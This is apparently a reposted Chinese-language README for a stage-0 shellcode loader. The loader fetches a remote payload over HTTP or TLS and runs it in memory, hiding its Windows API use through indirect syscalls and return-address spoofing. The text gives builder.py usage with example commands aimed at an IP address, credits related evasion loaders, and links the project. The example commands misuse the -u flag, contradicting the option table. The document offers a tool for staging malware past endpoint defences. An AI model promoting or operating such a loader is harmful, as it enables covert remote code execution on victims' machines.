第 0 阶段 Shellcode 下载远程有效负载并在内存中执行
Nt API 调用 NtAllocateVirtualMemory 是 NtProtectVirtualMemory 使用间接系统调用进行的。
LoadLibraryA 并且 WinHTTP 调用是通过返回地址欺骗执行的。
用法
Option | Description | Required | Default Value |
---|---|---|---|
-e | Http endpoint | Yes | |
-u | Http uri | Yes | |
-p | Http port | Yes | |
-a | User agent | No | Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
-s | Use TLS | No | Empty |
例子 :
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s
Credit
https://github.com/kyleavery/AceLdr
https://github.com/realoriginal/titanldr-ng
https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html
https://github.com/trickster0/TartarusGate
项目地址:
https://github.com/NtDallas/Svartalfheim
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里